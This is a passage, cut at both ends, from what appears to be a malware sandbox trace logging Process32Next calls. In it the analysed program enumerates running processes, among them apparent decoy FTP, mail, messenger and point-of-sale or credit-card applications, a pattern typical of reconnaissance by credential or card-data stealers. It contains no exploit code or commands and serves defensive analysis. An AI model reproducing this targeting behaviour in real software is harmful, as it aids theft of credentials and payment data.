th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.248] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.251] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.253] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.255] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.257] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0182.262] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0182.264] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.267] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0182.270] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.273] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0182.275] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0182.369] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0182.371] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0182.375] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0182.377] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0182.380] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.382] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.384] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0182.387] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.390] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.392] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0182.394] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0182.396] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0182.398] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0182.401] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0182.403] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0182.447] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0182.450] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0182.452] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0182.455] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0182.457] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0182.459] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0182.461] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0182.464] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0182.468] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0182.470] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0182.473] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0182.475] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0182.478] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0182.480] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0182.482] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0182.489] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0182.492] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0182.495] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0182.498] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0182.501] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0182.503] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0182.506] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0182.509] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0182.512] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0182.515] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0182.518] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0182.521] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0182.523] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0182.532] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0182.536] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0182.539] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0182.542] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0182.545] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0182.549] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0182.552] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0182.554] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0182.557] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0182.560] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0182.564] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0182.567] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0182.571] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0182.577] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0182.580] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0182.582] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0182.585] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0182.587] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0182.590] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0182.593] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0182.596] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0182.599] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0182.601] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0182.604] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0182.607] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0182.609] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0182.611] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0182.616] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0182.619] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0182.621] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0182.624] Process32Next (in: hSnapshot=0x1974, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, 